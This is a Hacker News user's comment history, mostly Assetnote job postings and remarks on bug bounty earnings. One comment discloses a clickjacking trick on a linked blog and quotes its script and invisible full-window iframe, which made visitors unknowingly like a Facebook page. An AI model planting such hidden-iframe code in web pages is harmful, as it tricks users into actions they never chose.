infosecau | 2 years ago | on: Hacking root EPP servers to take control of zones
infosecau | 2 years ago | on: 0x0: Share Files from Terminal
Alternatively, you can check out magic wormhole (for a more secure transfer of files between two terminals): https://magic-wormhole.readthedocs.io/en/latest/welcome.html...
infosecau | 3 years ago | on: Ask HN: Who is hiring? (July 2022)
By joining our growing engineering team at Assetnote as a Backend Engineer, you will be responsible for extending the capabilities of our Continuous Security Platform through developing our security engine.
In this role, you will be required to build and maintain our distributed scanning engine, improve scalability, performance, and reliability. This role requires that you are confident with distributed systems and software architecture.
Day to day you will be interfacing directly with our API development team and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/600D953230/
infosecau | 4 years ago | on: Ask HN: Who is hiring? (March 2022)
By joining our growing engineering team at Assetnote as a Site Reliability Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, design, scale and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the SRE & DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
infosecau | 4 years ago | on: Ask HN: Who is hiring? (February 2022)
By joining our growing engineering team at Assetnote as a DevOps Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, manage and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
infosecau | 4 years ago | on: Ask HN: Who is hiring? (January 2022)
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
Assetnote | Frontend Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a Frontend Engineer, you will be responsible for designing and engineering our React based frontend for our Continuous Security Platform.
In this role, you will be required to design, implement, improve and maintain frontend interfaces in Typescript React. This role requires that you are confident with designing and engineering frontend components with user experience in mind.
The solutions we develop on the UI side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/A2FA4AC75A/
Assetnote | DevOps Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a DevOps Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, manage and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
infosecau | 4 years ago | on: Ask HN: Who is hiring? (December 2021)
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
Assetnote | Frontend Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a Frontend Engineer, you will be responsible for designing and engineering our React based frontend for our Continuous Security Platform.
In this role, you will be required to design, implement, improve and maintain frontend interfaces in Typescript React. This role requires that you are confident with designing and engineering frontend components with user experience in mind.
The solutions we develop on the UI side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/A2FA4AC75A/
Assetnote | DevOps Engineer | Remote Australia
By joining our growing engineering team at Assetnote as a DevOps Engineer, you will be responsible for managing the infrastructure for our Continuous Security Platform.
In this role, you will be required to deploy, manage and maintain our infrastructure, alerting and metrics. This role requires that you are confident with modern infrastructure tooling and concepts such as AWS, Kubernetes and Terraform.
Occasionally, this role will require you to work outside regular work hours in case of emergencies.
The solutions we develop on the DevOps side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/0E09D3BEE4/
infosecau | 4 years ago | on: Ask HN: Who is hiring? (November 2021)
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
By joining our growing engineering team at Assetnote as a Frontend Engineer, you will be responsible for designing and engineering our React based frontend for our Continuous Security Platform.
In this role, you will be required to design, implement, improve and maintain frontend interfaces in Typescript React. This role requires that you are confident with designing and engineering frontend components with user experience in mind.
The solutions we develop on the UI side are dependent on our API, Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, API engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/A2FA4AC75A/
infosecau | 4 years ago | on: Taking over Uber accounts through voicemail
infosecau | 5 years ago | on: Ask HN: Who is hiring? (March 2021)
At Assetnote, we are building the world's best Attack Surface Management platform. Used by companies all around the world, from innovative startups to Fortune 100 companies, the platform you will be building is helping protect hundreds of thousands of assets from compromise.
By joining our growing engineering team at Assetnote as a Back End & API Engineer, you will be responsible for extending the capabilities of our Continuous Security Platform through developing our Python/Flask back end.
In this role, you will be required to build and maintain our APIs and back-end components, improve scalability, performance, and reliability, and also maintain our APIs and dependencies. This role requires that you are confident with GraphQL, PostgreSQL, using SQLAlchemy as an ORM, and be capable of engineering scalable database models.
The solutions we develop on the API side are dependent on our Security and Discovery Engines. Day to day you will be interfacing directly with our Engine development team, front-end engineers, and security researchers.
Assetnote is a remote-first company. This position is remote with a preference for candidates located in Australia, however, we will consider strong applicants located outside of Australia.
More details and application form here: https://apply.workable.com/assetnote/j/D75870A5D2/
infosecau | 5 years ago | on: Hacking on Bug Bounties for Four Years
infosecau | 5 years ago | on: Hacking on Bug Bounties for Four Years
infosecau | 9 years ago | on: High frequency security bug hunting: 120 days, 120 bugs
In addition to that, I work full time and participating in bug bounties was/is purely a part time endeavor of mine. Perhaps if I worked full time on bounties I could keep up. Not entirely sure how it would work out, but it would be a risky journey at first nonetheless.
infosecau | 9 years ago | on: High frequency security bug hunting: 120 days, 120 bugs
The total amount was just under $80,000 in 120 days. The table reflects payouts for bugs I was able to disclose, there are a fair few bugs worth >7k that I wasn't able to include in that table. Some platforms/programs explicitly asked not to be listed there.
infosecau | 10 years ago | on: The Story of BuiltWith
infosecau | 10 years ago | on: Why do ten Chicken McNuggets cost the same as twenty?
This was done via ClickJacking and here are the offending scripts/html:
<script>$(function(){var i=-1;$("#cksl7").hover(function(){i=$(this).closest("#v").attr("qjid");},function(){i=-1;});$(window).focus();$(window).blur(function(){document.getElementById("v").style.visibility="hidden";});});$(window).focus()</script>
<iframe id="cksl7" name="cksl7" src="http://cobweb.dartmouth.edu/~hchen/tmp.html" style="border:0px;left:-36px;top:-17px;position:absolute;filter:alpha(opacity=0);z-index:99999;opacity:0;overflow:hidden;width:1366px;height:705px;"></iframe>
You can unlike their page here: https://www.facebook.com/randomdirectionsblog
infosecau | 11 years ago | on: Show HN: Websec Weekly – Newsletter for web security enthusiasts
